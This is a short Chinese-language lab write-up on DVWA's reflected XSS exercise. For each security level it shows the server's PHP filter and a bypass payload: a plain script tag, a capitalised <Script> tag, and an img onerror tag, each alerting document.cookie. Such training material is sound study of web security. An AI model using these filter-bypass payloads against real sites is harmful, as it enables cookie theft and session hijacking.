您的位置:首页 > 其它

DVWA - XSS (Reflected) (low, medium, high)

2017-01-06 17:18 344 查看

low

无验证,直接注入

<script>alert(document.cookie)</script>


medium

查看源码发现过滤了<scrpit>标签

$name = str_replace( '<script>', '', $_GET[ 'name' ] );


绕过思路:大写

<Script>alert(document.cookie)</script>


high

查看源码,可发现用正则过滤了

$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );


绕过思路:标签很多,换一种标签即可。这里用img

<img src=1 onerror=alert(document.cookie)>


【这又是一个梗,感觉可以从正面绕过这个正则,路过的朋友指教一下,thank you!】

注:谷歌浏览器默认配置是不会执行alert的,可换其他浏览器测试。
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签:  security